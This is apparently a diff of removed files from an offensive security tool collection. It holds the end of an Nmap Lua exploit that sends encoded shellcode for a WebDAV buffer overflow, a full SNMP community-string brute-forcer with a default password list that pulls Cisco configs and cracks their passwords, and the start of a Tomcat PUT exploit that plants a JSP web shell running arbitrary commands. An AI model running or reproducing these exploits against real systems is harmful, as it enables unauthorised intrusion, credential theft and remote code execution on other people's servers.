payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
-- Shellcode
shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
payload = payload .. shellcode
payload = payload .. '>\r\n\r\n'
-- Exploiting the vulnerability
try(socket:send(payload))
-- We receive a 200 response if the payload succeeds.
response = try(socket:receive_bytes(80960))
socket:close()
-- Checking for 200 response in the response
local regex = "HTTP/1.1 (%d+)"
local status = string.match(response, regex)
if status == '200' then
-- Buffer overflow is successfully executed on the server.
vuln.state = vulns.STATE.EXPLOIT
vuln.exploit_results = response
elseif status == '400' then
-- Bad request error is occured because webdav is not installed.
vuln.state = vulns.STATE.LIKELY_VULN
vuln.exploit_results = "Server returned 400: Install webdav and try again."
elseif status == '502' then
-- Likely to have an error in the Server Name
vuln.state = vulns.STATE.LIKELY_VULN
vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
elseif status ~= nil then
vuln.exploit_results = response
end
return vuln_report:make_output(vuln)
end

View File

@ -1,789 +0,0 @@
#!/usr/bin/env python
# SNMP Bruteforce & Enumeration Script
# Requires metasploit, snmpwalk, snmpstat and john the ripper
__version__ = 'v1.0b'
from socket import socket, SOCK_DGRAM, AF_INET, timeout
from random import randint
from time import sleep
import optparse, sys, os
from subprocess import Popen, PIPE
import struct
import threading, thread
import tempfile
from scapy.all import (SNMP, SNMPnext, SNMPvarbind, ASN1_OID, SNMPget, ASN1_DECODING_ERROR, ASN1_NULL, ASN1_IPADDRESS,
SNMPset, SNMPbulk, IP)
##########################################################################################################
# Defaults
##########################################################################################################
class defaults:
rate=30.0
timeOut=2.0
port=161
delay=2
interactive=True
verbose=False
getcisco=True
colour=True
default_communities=['','0','0392a0','1234','2read','3com','3Com','3COM','4changes','access','adm','admin','Admin','administrator','agent','agent_steal','all','all private','all public','anycom','ANYCOM','apc','bintec','blue','boss','c','C0de','cable-d','cable_docsispublic@es0','cacti','canon_admin','cascade','cc','changeme','cisco','CISCO','cmaker','comcomcom','community','core','CR52401','crest','debug','default','demo','dilbert','enable','entry','field','field-service','freekevin','friend','fubar','guest','hello','hideit','host','hp_admin','ibm','IBM','ilmi','ILMI','intel','Intel','intermec','Intermec','internal','internet','ios','isdn','l2','l3','lan','liteon','login','logon','lucenttech','lucenttech1','lucenttech2','manager','master','microsoft','mngr','mngt','monitor','mrtg','nagios','net','netman','network','nobody','NoGaH$@!','none','notsopublic','nt','ntopia','openview','operator','OrigEquipMfr','ourCommStr','pass','passcode','password','PASSWORD','pr1v4t3','pr1vat3','private',' private','private ','Private','PRIVATE','private@es0','Private@es0','private@es1','Private@es1','proxy','publ1c','public',' public','public ','Public','PUBLIC','public@es0','public@es1','public/RO','read','read-only','readwrite','read-write','red','regional','<removed>','rmon','rmon_admin','ro','root','router','rw','rwa','sanfran','san-fran','scotty','secret','Secret','SECRET','Secret C0de','security','Security','SECURITY','seri','server','snmp','SNMP','snmpd','snmptrap','snmp-Trap','SNMP_trap','SNMPv1/v2c','SNMPv2c','solaris','solarwinds','sun','SUN','superuser','supervisor','support','switch','Switch','SWITCH','sysadm','sysop','Sysop','system','System','SYSTEM','tech','telnet','TENmanUFactOryPOWER','test','TEST','test2','tiv0li','tivoli','topsecret','traffic','trap','user','vterm1','watch','watchit','windows','windowsnt','workstation','world','write','writeit','xyzzy','yellow','ILMI']
##########################################################################################################
# OID's
##########################################################################################################
''' Credits
Some OID's borowed from Cisc0wn script
# Cisc0wn - The Cisco SNMP 0wner.
# Daniel Compton
# www.commonexploits.com
# contact@commexploits.com
'''
RouteOIDS={
'ROUTDESTOID': [".1.3.6.1.2.1.4.21.1.1", "Destination"],
'ROUTHOPOID': [".1.3.6.1.2.1.4.21.1.7", "Next Hop"],
'ROUTMASKOID': [".1.3.6.1.2.1.4.21.1.11", "Mask"],
'ROUTMETOID': [".1.3.6.1.2.1.4.21.1.3", "Metric"],
'ROUTINTOID': [".1.3.6.1.2.1.4.21.1.2", "Interface"],
'ROUTTYPOID': [".1.3.6.1.2.1.4.21.1.8", "Route type"],
'ROUTPROTOID': [".1.3.6.1.2.1.4.21.1.9", "Route protocol"],
'ROUTAGEOID': [".1.3.6.1.2.1.4.21.1.10", "Route age"]
}
InterfaceOIDS={
#Interface Info
'INTLISTOID': [".1.3.6.1.2.1.2.2.1.2", "Interfaces"],
'INTIPLISTOID': [".1.3.6.1.2.1.4.20.1.1", "IP address"],
'INTIPMASKOID': [".1.3.6.1.2.1.4.20.1.3", "Subnet mask"],
'INTSTATUSLISTOID':[".1.3.6.1.2.1.2.2.1.8", "Status"]
}
ARPOIDS={
# Arp table
'ARPADDR': [".1.3.6.1.2.1.3.1 ","ARP address method A"],
'ARPADDR2': [".1.3.6.1.2.1.3.1 ","ARP address method B"]
}
OIDS={
'SYSTEM':["iso.3.6.1.2.1.1 ","SYSTEM Info"]
}
snmpstat_args={
'Interfaces':["-Ci","Interface Info"],
'Routing':["-Cr","Route Info"],
'Netstat':["","Netstat"],
#'Statistics':["-Cs","Stats"]
}
'''Credits
The following OID's are borrowed from snmpenum.pl script
# ----by filip waeytens 2003----
# ---- DA SCANIT CREW www.scanit.be ----
# filip.waeytens@hushmail.com
'''
WINDOWS_OIDS={
'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
'INSTALLED SOFTWARE': ["1.3.6.1.2.1.25.6.3.1.2","Installed Software"],
'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
'DOMAIN': ["1.3.6.1.4.1.77.1.4.1","Domain"],
'USERS': ["1.3.6.1.4.1.77.1.2.25","Users"],
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
'SHARES': ["1.3.6.1.4.1.77.1.2.27","Shares"],
'DISKS': ["1.3.6.1.2.1.25.2.3.1.3","Disks"],
'SERVICES': ["1.3.6.1.4.1.77.1.2.3.1.1","Services"],
'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"],
'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"]
}
LINUX_OIDS={
'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
'MOUNTPOINTS': ["1.3.6.1.2.1.25.2.3.1.3","MountPoints"],
'RUNNING SOFTWARE PATHS': ["1.3.6.1.2.1.25.4.2.1.4","Running Software Paths"],
'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"],
'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"]
}
CISCO_OIDS={
'LAST TERMINAL USERS': ["1.3.6.1.4.1.9.9.43.1.1.6.1.8","Last Terminal User"],
'INTERFACES': ["1.3.6.1.2.1.2.2.1.2","Interfaces"],
'SYSTEM INFO': ["1.3.6.1.2.1.1.1","System Info"],
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
'SNMP Communities': ["1.3.6.1.6.3.12.1.3.1.4","Communities"],
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
'IP ADDRESSES': ["1.3.6.1.2.1.4.20.1.1","IP Addresses"],
'INTERFACE DESCRIPTIONS': ["1.3.6.1.2.1.31.1.1.1.18","Interface Descriptions"],
'HARDWARE': ["1.3.6.1.2.1.47.1.1.1.1.2","Hardware"],
'TACACS SERVER': ["1.3.6.1.4.1.9.2.1.5","TACACS Server"],
'LOG MESSAGES': ["1.3.6.1.4.1.9.9.41.1.2.3.1.5","Log Messages"],
'PROCESSES': ["1.3.6.1.4.1.9.9.109.1.2.1.1.2","Processes"],
'SNMP TRAP SERVER': ["1.3.6.1.6.3.12.1.2.1.7","SNMP Trap Server"]
}
##########################################################################################################
# Classes
##########################################################################################################
class SNMPError(Exception):
'''Credits
Class copied from sploitego project
__original_author__ = 'Nadeem Douba'
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
'''
pass
class SNMPVersion:
'''Credits
Class copied from sploitego project
__original_author__ = 'Nadeem Douba'
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
'''
v1 = 0
v2c = 1
v3 = 2
@classmethod
def iversion(cls, v):
if v in ['v1', '1']:
return cls.v1
elif v in ['v2', '2', 'v2c']:
return cls.v2c
elif v in ['v3', '3']:
return cls.v3
raise ValueError('No such version %s' % v)
@classmethod
def sversion(cls, v):
if not v:
return 'v1'
elif v == 1:
return 'v2c'
elif v == 2:
return 'v3'
raise ValueError('No such version number %s' % v)
class SNMPBruteForcer(object):
#This class is used for the sploitego method of bruteforce (--sploitego)
'''Credits
Class copied from sploitego project
__original_author__ = 'Nadeem Douba'
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
'''
def __init__(self, agent, port=161, version='v2c', timeout=0.5, rate=1000):
self.version = SNMPVersion.iversion(version)
self.s = socket(AF_INET, SOCK_DGRAM)
self.s.settimeout(timeout)
self.addr = (agent, port)
self.rate = rate
def guess(self, communities):
p = SNMP(
version=self.version,
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
)
r = []
for c in communities:
i = randint(0, 2147483647)
p.PDU.id = i
p.community = c
self.s.sendto(str(p), self.addr)
sleep(1/self.rate)
while True:
try:
p = SNMP(self.s.recvfrom(65535)[0])
except timeout:
break
r.append(p.community.val)
return r
def __del__(self):
self.s.close()
class SNMPResults:
addr=''
version=''
community=''
write=False
def __eq__(self, other):
return self.addr == other.addr and self.version == other.version and self.community == other.community
##########################################################################################################
# Colour output functions
##########################################################################################################
# for color output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
#following from Python cookbook, #475186
def has_colours(stream):
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
# guess false in case of error
return False
has_colours = has_colours(sys.stdout)
def printout(text, colour=WHITE):
if has_colours and defaults.colour:
seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m\n"
sys.stdout.write(seq)
else:
#sys.stdout.write(text)
print text
##########################################################################################################
#
##########################################################################################################
def banner(art=True):
if art:
print >> sys.stderr, " _____ _ ____ _______ ____ __ "
print >> sys.stderr, " / ___// | / / |/ / __ \\ / __ )_______ __/ /____ "
print >> sys.stderr, " \\__ \\/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \\"
print >> sys.stderr, " ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/"
print >> sys.stderr, "/____/_/ |_/_/ /_/_/ /_____/_/ \\__,_/\\__/\\___/ "
print >> sys.stderr, ""
print >> sys.stderr, "SNMP Bruteforce & Enumeration Script " + __version__
print >> sys.stderr, "http://www.secforce.com / nikos.vassakis <at> secforce.com"
print >> sys.stderr, "###############################################################"
print >> sys.stderr, ""
def listener(sock,results):
while True:
try:
response,addr=SNMPrecv(sock)
except timeout:
continue
except KeyboardInterrupt:
break
except:
break
r=SNMPResults()
r.addr=addr
r.version=SNMPVersion.sversion(response.version.val)
r.community=response.community.val
results.append(r)
printout (('%s : %s \tVersion (%s):\t%s' % (str(addr[0]),str(addr[1]), SNMPVersion.sversion(response.version.val),response.community.val)),WHITE)
def SNMPrecv(sock):
try:
recv,addr=sock.recvfrom(65535)
response = SNMP(recv)
return response,addr
except:
raise
def SNMPsend(sock, packets, ip, port=defaults.port, community='', rate=defaults.rate):
addr = (ip, port)
for packet in packets:
i = randint(0, 2147483647)
packet.PDU.id = i
packet.community = community
sock.sendto(str(packet), addr)
sleep(1/rate)
def SNMPRequest(result,OID, value='', TimeOut=defaults.timeOut):
s = socket(AF_INET, SOCK_DGRAM)
s.settimeout(TimeOut)
response=''
r=result
version = SNMPVersion.iversion(r.version)
if value:
p = SNMP(
version=version,
PDU=SNMPset(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID), value=value)])
)
else:
p = SNMP(
version=version,
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID))])
)
SNMPsend(s,p,r.addr[0],r.addr[1],r.community)
for x in range(0, 5):
try:
response,addr=SNMPrecv(s)
break
except timeout: # if request times out retry
sleep(0.5)
continue
s.close
if not response:
raise timeout
return response
def testSNMPWrite(results,options,OID='.1.3.6.1.2.1.1.4.0'):
#Alt .1.3.6.1.2.1.1.5.0
setval='HASH(0xDEADBEF)'
for r in results:
try:
originalval=SNMPRequest(r,OID)
if originalval:
originalval=originalval[SNMPvarbind].value.val
SNMPRequest(r,OID,setval)
curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
if curval == setval:
r.write=True
try:
SNMPRequest(r,OID,originalval)
except timeout:
pass
if options.verbose: printout (('\t %s (%s) (RW)' % (r.community,r.version)),GREEN)
curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
if curval != originalval:
printout(('Couldn\'t restore value to: %s (OID: %s)' % (str(originalval),str(OID))),RED)
else:
if options.verbose: printout (('\t %s (%s) (R)' % (r.community,r.version)),BLUE)
else:
r.write=None
printout (('\t %s (%s) (Failed)' % (r.community,r.version)),RED)
except timeout:
r.write=None
printout (('\t %s (%s) (Failed!)' % (r.community,r.version)),RED)
continue
def generic_snmpwalk(snmpwalk_args,oids):
for key, val in oids.items():
try:
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
print '\tINFO'
print '\t----\t'
for i in out:
print '\t',i.strip()
print '\n'
except KeyboardInterrupt:
pass
def enumerateSNMPWalk(result,options):
r=result
snmpwalk_args=' -c "'+r.community+'" -'+r.version+' '+str(r.addr[0])+':'+str(r.addr[1])
############################################################### Enumerate OS
if options.windows:
generic_snmpwalk(snmpwalk_args,WINDOWS_OIDS)
return
if options.linux:
generic_snmpwalk(snmpwalk_args,LINUX_OIDS)
return
if options.cisco:
generic_snmpwalk(snmpwalk_args,CISCO_OIDS)
############################################################### Enumerate CISCO Specific
############################################################### Enumerate Routes
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+'.1.3.6.1.2.1.4.21.1.1'+' '+'| awk \'{print $NF}\' 2>&1''').readlines()
lines = len(out)
printout('################## Enumerating Routing Table (snmpwalk)',YELLOW)
try:
for key, val in RouteOIDS.items(): #Enumerate Routes
#print '\t *',val[1], val[0]
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+'| awk \'{print $NF}\' 2>&1').readlines()
entry[val[1]]=out
print '\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge'
print '\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---'
for j in range(lines):
print( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
'\t\t'+entry['Next Hop'][j].strip().ljust(12,' ') +
'\t'+entry['Mask'][j].strip().ljust(12,' ') +
'\t\t'+entry['Metric'][j].strip().center(6,' ') +
'\t'+entry['Interface'][j].strip().center(10,' ') +
'\t'+entry['Route type'][j].strip().center(4,' ') +
'\t'+entry['Route protocol'][j].strip().center(8,' ') +
'\t'+entry['Route age'][j].strip().center(3,' ')
)
except KeyboardInterrupt:
pass
############################################################### Enumerate Arp
print '\n'
for key, val in ARPOIDS.items():
try:
printout(('################## Enumerating ARP Table using: %s (%s)'%(val[0],val[1])),YELLOW)
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2 | cut -d\':\' -f 2').readlines()
lines=len(out)/3
entry['V']=out[0*lines:1*lines]
entry['MAC']=out[1*lines:2*lines]
entry['IP']=out[2*lines:3*lines]
print '\tIP\t\tMAC\t\t\tV'
print '\t--\t\t---\t\t\t--'
for j in range(lines):
print( '\t'+entry['IP'][j].strip().ljust(12,' ') +
'\t'+entry['MAC'][j].strip().ljust(18,' ') +
'\t'+entry['V'][j].strip().ljust(2,' ')
)
print '\n'
except KeyboardInterrupt:
pass
############################################################### Enumerate SYSTEM
for key, val in OIDS.items():
try:
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
print '\tINFO'
print '\t----\t'
for i in out:
print '\t',i.strip()
print '\n'
except KeyboardInterrupt:
pass
############################################################### Enumerate Interfaces
for key, val in snmpstat_args.items():
try:
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
out=os.popen('snmpnetstat'+snmpwalk_args+' '+val[0]).readlines()
for i in out:
print '\t',i.strip()
print '\n'
except KeyboardInterrupt:
pass
def get_cisco_config(result,options):
printout(('################## Trying to get config with: %s'% result.community),YELLOW)
identified_ip=os.popen('ifconfig eth0 |grep "inet addr:" |cut -d ":" -f 2 |awk \'{ print $1 }\'').read()
if options.interactive:
Local_ip = raw_input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
else:
Local_ip = identified_ip.strip()
if not (os.path.isdir("./output")):
os.popen('mkdir output')
p=Popen('msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E ',shell=True,stdin=PIPE,stdout=PIPE, stderr=PIPE) #>/dev/null 2>&1
print 'msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E '
out=[]
while p.poll() is None:
line=p.stdout.readline()
out.append(line)
print '\t',line.strip()
printout('################## Passwords Found:',YELLOW)
encrypted=[]
for i in out:
if "Password" in i:
print '\t',i.strip()
if "Encrypted" in i:
encrypted.append(i.split()[-1])
if encrypted:
print '\nCrack encrypted password(s)?'
for i in encrypted:
print '\t',i
#if (False if raw_input("(Y/n):").lower() == 'n' else True):
if not get_input("(Y/n):",'n',options):
with open('./hashes', 'a') as f:
for i in encrypted:
f.write(i+'\n')
p=Popen('john ./hashes',shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)
while p.poll() is None:
print '\t',p.stdout.readline()
print 'Passwords Cracked:'
out=os.popen('john ./hashes --show').readlines()
for i in out:
print '\t', i.strip()
out=[]
while p.poll() is None:
line=p.stdout.readline()
out.append(line)
print '\t',line.strip()
def select_community(results,options):
default=None
try:
printout("\nIdentified Community strings",WHITE)
for l,r in enumerate(results):
if r.write==True:
printout ('\t%s) %s %s (%s)(RW)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),GREEN)
default=l
elif r.write==False:
printout ('\t%s) %s %s (%s)(RO)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),BLUE)
else:
printout ('\t%s) %s %s (%s)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),RED)
if default is None:
default = l
if not options.enum:
return
if options.interactive:
selection=raw_input("Select Community to Enumerate ["+str(default)+"]:")
if not selection:
selection=default
else:
selection=default
try:
return results[int(selection)]
except:
return results[l]
except KeyboardInterrupt:
exit(0)
def SNMPenumeration(result,options):
getcisco=defaults.getcisco
try:
printout (("\nEnumerating with READ-WRITE Community string: %s (%s)" % (result.community,result.version)),YELLOW)
enumerateSNMPWalk(result,options)
if options.windows or options.linux:
if not get_input("Get Cisco Config (y/N):",'y',options):
getcisco=False
if getcisco:
get_cisco_config(result,options)
except KeyboardInterrupt:
print '\n'
return
def password_brutefore(options, communities, ips):
s = socket(AF_INET, SOCK_DGRAM)
s.settimeout(options.timeOut)
results=[]
#Start the listener
T = threading.Thread(name='listener', target=listener, args=(s,results,))
T.start()
# Craft SNMP's for both versions
p1 = SNMP(
version=SNMPVersion.iversion('v1'),
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
)
p2c = SNMP(
version=SNMPVersion.iversion('v2c'),
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
)
packets = [p1, p2c]
#We try each community string
for i,community in enumerate(communities):
#sys.stdout.write('\r{0}'.format('.' * i))
#sys.stdout.flush()
for ip in ips:
SNMPsend(s, packets, ip, options.port, community.rstrip(), options.rate)
#We read from STDIN if necessary
if options.stdin:
while True:
try:
try:
community=raw_input().strip('\n')
for ip in ips:
SNMPsend(s, packets, ip, options.port, community, options.rate)
except EOFError:
break
except KeyboardInterrupt:
break
try:
print "Waiting for late packets (CTRL+C to stop)"
sleep(options.timeOut+options.delay) #Waiting in case of late response
except KeyboardInterrupt:
pass
T._Thread__stop()
s.close
#We remove any duplicates. This relies on the __equal__
newlist = []
for i in results:
if i not in newlist:
newlist.append(i)
return newlist
def get_input(string,non_default_option,options):
#(True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False)
if options.interactive:
if raw_input(string).lower() == non_default_option:
return True
else:
return False
else:
print string
return False
def main():
parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter())
parser.set_usage("python snmp-brute.py -t <IP> -f <DICTIONARY>")
#parser.add_option('-h','--help', help='Show this help message and exit', action=parser.print_help())
parser.add_option('-f','--file', help='Dictionary file', dest='dictionary', action='store')
parser.add_option('-t','--target', help='Host IP', dest='ip', action='store')
parser.add_option('-p','--port', help='SNMP port', dest='port', action='store', type='int',default=defaults.port)
groupAlt = optparse.OptionGroup(parser, "Alternative Options")
groupAlt.add_option('-s','--stdin', help='Read communities from stdin', dest='stdin', action='store_true',default=False)
groupAlt.add_option('-c','--community', help='Single Community String to use', dest='community', action='store')
groupAlt.add_option('--sploitego', help='Sploitego\'s bruteforce method', dest='sploitego', action='store_true',default=False)
groupAuto = optparse.OptionGroup(parser, "Automation")
groupAuto.add_option('-b','--bruteonly', help='Do not try to enumerate - only bruteforce', dest='enum', action='store_false',default=True)
groupAuto.add_option('-a','--auto', help='Non Interactive Mode', dest='interactive', action='store_false',default=True)
groupAuto.add_option('--no-colours', help='No colour output', dest='colour', action='store_false',default=True)
groupAdvanced = optparse.OptionGroup(parser, "Advanced")
groupAdvanced.add_option('-r','--rate', help='Send rate', dest='rate', action='store',type='float', default=defaults.rate)
groupAdvanced.add_option('--timeout', help='Wait time for UDP response (in seconds)', dest='timeOut', action='store', type='float' ,default=defaults.timeOut)
groupAdvanced.add_option('--delay', help='Wait time after all packets are send (in seconds)', dest='delay', action='store', type='float' ,default=defaults.delay)
groupAdvanced.add_option('--iplist', help='IP list file', dest='lfile', action='store')
groupAdvanced.add_option('-v','--verbose', help='Verbose output', dest='verbose', action='store_true',default=False)
groupOS = optparse.OptionGroup(parser, "Operating Systems")
groupOS.add_option('--windows', help='Enumerate Windows OIDs (snmpenum.pl)', dest='windows', action='store_true',default=False)
groupOS.add_option('--linux', help='Enumerate Linux OIDs (snmpenum.pl)', dest='linux', action='store_true',default=False)
groupOS.add_option('--cisco', help='Append extra Cisco OIDs (snmpenum.pl)', dest='cisco', action='store_true',default=False)
parser.add_option_group(groupAdvanced)
parser.add_option_group(groupAuto)
parser.add_option_group(groupOS)
parser.add_option_group(groupAlt)
(options, arguments) = parser.parse_args()
communities=[]
ips=[]
banner(options.colour) #For SPARTA!!!
if not options.ip and not options.lfile:
#Can't continue without target
parser.print_help()
exit(0)
else:
# Create the list of targets
if options.lfile:
try:
with open(options.lfile) as t:
ips = t.read().splitlines() #Potential DoS
except:
print "Could not open targets file: " + options.lfile
exit(0)
else:
ips.append(options.ip)
if not options.colour:
defaults.colour=False
# Create the list of communities
if options.dictionary: # Read from file
with open(options.dictionary) as f:
communities=f.read().splitlines() #Potential DoS
elif options.community: # Single community
communities.append(options.community)
elif options.stdin: # Read from input
communities=[]
else: #if not options.community and not options.dictionary and not options.stdin:
communities=default_communities
#We ensure that default communities are included
#if 'public' not in communities:
# communities.append('public')
#if 'private' not in communities:
# communities.append('private')
if options.stdin:
options.interactive=False
results=[]
if options.stdin:
print >> sys.stderr, "Reading input for community strings ..."
else:
print >> sys.stderr, "Trying %d community strings ..." % len(communities)
if options.sploitego: #sploitego method of bruteforce
if ips:
for ip in ips:
for version in ['v1', 'v2c']:
bf = SNMPBruteForcer(ip, options.port, version, options.timeOut,options.rate)
result=bf.guess(communities)
for i in result:
r=SNMPResults()
r.addr=(ip,options.port)
r.version=version
r.community=i
results.append(r)
print ip, version+'\t',result
else:
parser.print_help()
else:
results = password_brutefore(options, communities, ips)
#We identify whether the community strings are read or write
if results:
printout("\nTrying identified strings for READ-WRITE ...",WHITE)
testSNMPWrite(results,options)
else:
printout("\nNo Community strings found",RED)
exit(0)
#We attempt to enumerate the router
while options.enum:
SNMPenumeration(select_community(results,options),options)
#if (True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False):
if get_input("Enumerate with different community? (y/N):",'y',options):
continue
else:
break
if not options.enum:
select_community(results,options)
print "Finished!"
if __name__ == "__main__":
main()

View File

@ -1,213 +0,0 @@
#!/usr/bin/python
import requests
import re
import signal
from optparse import OptionParser
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
banner="""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
"""
def signal_handler(signal, frame):
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
exit()
signal.signal(signal.SIGINT, signal_handler)
def removetags(tags):
remove = re.compile('<.*?>')
txt = re.sub(remove, '\n', tags)
return txt.replace("\n\n\n","\n")
def getContent(url,f):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
requests.packages.urllib3.disable_warnings()
re=requests.get(str(url)+"/"+str(f), headers=headers,verify=False)
return re.content
def createPayload(url,f):
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
requests.packages.urllib3.disable_warnings()
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers,verify=False)
if req.status_code==201:
print "File Created .."
def RCE(url,f):
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
